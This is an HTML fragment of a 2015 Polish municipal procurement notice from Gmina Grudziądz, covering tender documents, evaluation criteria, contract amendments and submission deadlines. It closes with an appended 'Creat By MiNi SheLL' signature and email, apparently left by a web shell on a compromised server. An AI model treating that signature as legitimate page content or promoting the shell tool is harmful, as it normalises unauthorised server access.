</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wzór oferty; Wykaz części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Czas przystapienia do usunięcia awarii - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: 
1. W przypadkach przewidzianych w umowie dopuszcza się wprowadzanie zmian za zgodą Zamawiającego.
2. Zmiany umowy, o których mowa w ust.1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 Pzp. 
3. Zmiany, o których mowa w ust. 1 mogą dotyczyć:
1) konieczności zmiany terminu wykonania przedmiotu umowy w przypadku wstrzymania wykonywania całości lub części prac na skutek wystąpienia okoliczności niezależnych od Wykonawcy 2) zmiany obowiązujących  przepisów oraz stawki VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Grudziądz, ul. Wybickiego 38, 86-300 Grudziądz, p. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2015 godzina 10:00, miejsce: Urząd Gminy Grudziądz, ul. Wybickiego 38, 86-300 Grudziądz, p. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com